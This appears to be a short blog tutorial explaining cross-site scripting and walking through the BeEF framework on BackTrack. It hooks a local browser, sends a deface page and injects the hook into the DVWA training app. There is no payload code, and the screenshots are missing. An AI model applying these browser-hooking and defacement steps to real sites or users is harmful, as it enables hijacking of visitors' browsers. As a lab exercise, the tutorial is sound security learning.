XSS CROSS SITE SCRIPTING
Is an action that allows atacker to edit / inject an existing script into web application that vulnerability, For the XSS Cross Site Scripting Cheat Sheet you can read it. Cross-site scripting holes are web-application vulnerabilities which allow attackers to bypass client-side security mechanisms normally imposed on web content by modern web browser.
The effect of this attack is enable attacker to handle the target system like key logging, deface, etc. The type of XSS Cross Site Scripting are persistent and non-persistent. The example Non-persistent XSS vulnerabilities in Google could allow malicious sites to attack Google users who visit them while logged in. and A persistent
cross-zone scripting vulnerability coupled with a
computer worm allowed execution of arbitrary code and listing of filesystem contents via a QuickTime movie on
MySpace. (
wikipedia).
Practicall XSS Scripting using Beef Framework.
In the Backtrack there are two kinds of Beef : Beef and Beef-Ng. In this stage tried with beef. Open the beef and look its script load. The hook web page load the beefmagic.js.php to open the conection with target.
 |
| Run Beef |
Open in the browser
 |
| Beef Web Page |
After login, to know the beef running normally open in a new browser example hook.
 |
| Example Beef |
The connection target and attacker been connected.Get the zombie 127.0.0.1 using firefox and linux operating system. In the log summary zombie target connected.
 |
| Get zombie |
Try to send the deface page...and look the victim web page.
 |
| Deface Web Page |
Next, tried with DVWA, inject the DVWA page with the hook script. if connected try to send the pop up message like this.
 |
| DVWA Pop Up Zombie |
 |
| DVWA Beef Infected |
Keep to try
0 comments:
Post a Comment